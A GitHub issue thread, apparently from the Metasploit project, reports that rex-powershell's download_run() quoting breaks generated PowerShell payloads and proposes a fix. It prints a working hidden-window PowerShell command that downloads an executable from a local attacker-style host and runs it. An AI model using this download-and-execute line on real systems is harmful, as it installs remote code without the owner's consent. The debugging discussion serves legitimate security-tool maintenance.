xl00t
commented
11 months ago Example or payload run after fix:
Closed xl00t closed 9 months ago
xl00t
commented
11 months ago Example or payload run after fix:
xl00t
commented
11 months ago 
sempervictus
commented
11 months ago Leaving comment here so i can dive into this a bit more when i have a sec. First glance though, the PSH syntax is missing a variable interpolation: $z="echo ($env:temp+'\7dX4tlxd.exe')" vs $z="echo ($($env:temp+'\7dX4tlxd.exe'))"
R7 folks: feel free to assign me if this is in fact a rex-powershell concern. I do have some deviation from upstream in quote handling but for very different reasons having to do with code embedding for in-memory compilation and the absurdity of MSFT's HEREDOC semantics.
xl00t
commented
11 months ago Hey! Thanks for reviewing my issues I tested with variable interpolation and the behavior stay the same. But when stripping out the quotes it is working as expected again Do you have other ideas ?
github-actions[bot]
commented
10 months ago Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
github-actions[bot]
commented
9 months ago Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
Using a custom rc script in order to replicate the behavior.
Output:
The problem is that the payload will only work when being executed on cmd interpreter.
If being run from powershell, the
$z="echo ($env:temp+'\7dX4tlxd.exe')"part will resolve in an error because of the quoting will prevent the echo from occur.in order to debug we will not use hidden window flag and run this command:
powershell.exe -nop -c $z="echo ($env:temp+'\7dX4tlxd.exe')"; echo $zcmd output:
normal behavior
powershell output:
non normal behavior
Because of this behavior we cant use base64 encoded payload.
Trying with
set PSH-EncodedCommand trueoutput:
debug:
as we pass
echo (C:\Users\nobody\AppData\Local\Temp+'\7dX4tlxd.exe')toDownloadFileargument the payload break.Remediation
Taking back our debug payload
powershell.exe -nop -c $z="echo ($env:temp+'\7dX4tlxd.exe')"; echo $zbut removing double quoting for $z variable like this.powershell.exe -nop -c $z=echo ($env:temp+'\7dX4tlxd.exe'); echo $zoutput:
cmd
normal behavior
powershell
normal behavior
The quoting of the $z variable is done by
Rex::Powershell::PshMethods.download_run()and if we remove it seems like everything will be fixed for this case.https://github.com/rapid7/rex-powershell/blob/master/lib/rex/powershell/psh_methods.rb#L29-L32
Should be replaced by
The others modules using the
download_run()methods are those ones:Seen their code this change shouldn't make a big differences but i will give a test tomorrow.
After change this is the output payload:
powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\h68IJGBy.exe'); (new-object System.Net.WebClient).DownloadFile('http://192.168.1.25:8080/2qhMMfYRv', $z); invoke-item $zWhich work for both raw and encoded commands, in cmd and powershell
I wasnt sure if i were supposed to open an issue to metasploit or rex-powershell repo since both are affected, sorry if i do mistake
Metasploit version
Framework: 6.3.38-dev-b32fe19545 Console : 6.3.38-dev-b32fe19545